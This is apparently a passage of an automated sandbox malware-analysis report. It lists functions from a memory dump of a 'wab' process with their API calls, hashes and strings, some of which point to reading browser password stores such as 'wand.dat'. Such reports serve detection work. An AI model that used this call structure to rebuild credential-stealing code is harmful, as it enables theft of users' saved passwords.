                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                  • String ID: MS Sans Serif
                  • API String ID: 210187428-168460110
                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                  Function 00409D7F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ClassName_wcsicmpmemset
                  • String ID: edit
                  • API String ID: 2747424523-2167791130
                  • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                  • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                  • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                  • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                  Function 00414E13 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                  • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                  • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                  • String ID: SHAutoComplete$shlwapi.dll
                  • API String ID: 3150196962-1506664499
                  • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                  • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                  • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                  • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                  Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memcmp
                  • String ID:
                  • API String ID: 3384217055-0
                  • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                  • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                  • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                  • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                  Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$memcpy
                  • String ID:
                  • API String ID: 368790112-0
                  • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                  • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                  • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                  • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                  Function 00410D9B Relevance: 6.2, APIs: 4, Instructions: 169windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                    • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                    • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                    • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                  • GetMenu.USER32(?), ref: 00410F8D
                  • GetSubMenu.USER32(00000000), ref: 00410F9A
                  • GetSubMenu.USER32(00000000), ref: 00410F9D
                  • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                  • String ID:
                  • API String ID: 1889144086-0
                  • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                  • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                  • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                  • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                  Function 00417FD5 Relevance: 6.1, APIs: 4, Instructions: 138fileCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                  • GetLastError.KERNEL32 ref: 0041810A
                  • CloseHandle.KERNEL32(00000000), ref: 00418120
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: File$CloseCreateErrorHandleLastMappingView
                  • String ID:
                  • API String ID: 1661045500-0
                  • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                  • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                  • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                  • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                  Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                  • memcpy.MSVCRT ref: 0042EC7A
                  Strings
                  • Cannot add a column to a view, xrefs: 0042EBE8
                  • virtual tables may not be altered, xrefs: 0042EBD2
                  • sqlite_altertab_%s, xrefs: 0042EC4C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpymemset
                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                  • API String ID: 1297977491-2063813899
                  • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                  • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                  • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                  • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                  Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 0040560C
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                    • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                    • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                  • String ID: *.*$dat$wand.dat
                  • API String ID: 2618321458-1828844352
                  • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                  • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                  • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                  • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                  Function 00410C46 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                  • wcslen.MSVCRT ref: 00410C74
                  • _wtoi.MSVCRT ref: 00410C80
                  • _wcsicmp.MSVCRT ref: 00410CCE
                  • _wcsicmp.MSVCRT ref: 00410CDF
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                  • String ID:
                  • API String ID: 1549203181-0
                  • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                  • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                  • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                  • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                  Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 00412057
                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                  • GetKeyState.USER32(00000010), ref: 0041210D
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                  • String ID:
                  • API String ID: 3550944819-0
                  • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                  • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                  • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                  • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                  Function 0040A8D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                  Download Yara Rule
                  APIs
                  • wcslen.MSVCRT ref: 0040A8E2
                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                  • memcpy.MSVCRT ref: 0040A94F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocwcslen
                  • String ID:
                  • API String ID: 3023356884-0
                  • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                  • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                  • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                  • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                  Function 0040B1D1 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                  • wcslen.MSVCRT ref: 0040B1DE
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                  • memcpy.MSVCRT ref: 0040B248
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocwcslen
                  • String ID:
                  • API String ID: 3023356884-0
                  • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                  • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                  Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID: @
                  • API String ID: 3510742995-2766056989
                  • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                  • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                  • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                  • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                  Function 0040AED2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID:
                  • API String ID: 1865533344-0
                  • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                  • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                  • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                  • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                  Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                  Download Yara Rule
                  APIs
                  • strlen.MSVCRT ref: 0040B0D8
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                    • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                    • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                  • memcpy.MSVCRT ref: 0040B159
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@$memcpy$mallocstrlen
                  • String ID:
                  • API String ID: 1171893557-0
                  • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                  • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                  Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 004144E7
                    • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                    • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                  • memset.MSVCRT ref: 0041451A
                  • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                  • String ID:
                  • API String ID: 1127616056-0
                  • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                  • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                  • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                  • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                  Function 0042FE8B Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: memcpy$memset
                  • String ID: sqlite_master
                  • API String ID: 438689982-3163232059
                  • Opcode ID: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                  • Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
                  • Opcode Fuzzy Hash: ce75bbd10503082b7a64f0374325e472d1c426e795aaa729e5fb1d324fd651cc
                  • Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
                  Function 00414D8A Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                  Download Yara Rule
                  APIs
                  • SHGetMalloc.SHELL32(?), ref: 00414D9A
                  • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                  • wcscpy.MSVCRT ref: 00414DF3
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: BrowseFolderFromListMallocPathwcscpy
                  • String ID:
                  • API String ID: 3917621476-0
                  • Opcode ID: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                  • Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
                  • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                  • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                  Function 00410FB4 Relevance: 6.0, APIs: 4, Instructions: 50windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                    • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                  • _snwprintf.MSVCRT ref: 00410FE1
                  • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                  • _snwprintf.MSVCRT ref: 0041100C
                  • wcscat.MSVCRT ref: 0041101F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                  • String ID:
                  • API String ID: 822687973-0
                  • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                  • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                  • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                  • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                  Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                  Download Yara Rule
                  APIs
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                  • malloc.MSVCRT ref: 00417459
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                  • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$??3@malloc
                  • String ID:
                  • API String ID: 4284152360-0
                  • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                  • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                  • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                  • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                  Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                  • RegisterClassW.USER32(?), ref: 00412428
                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                  • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule$ClassCreateRegisterWindow
                  • String ID:
                  • API String ID: 2678498856-0
                  • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                  • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                  • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                  • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                  Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,?), ref: 00409B40
                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                  Memory Dump Source
                  • Source File: 0000000B.00000002.2528263092.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: MessageSend$Item
                  • String ID:
                  • API String ID: 3888421826-0
                  • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                  • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                  • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                  • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                  Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                  Download Yara Rule
                  APIs
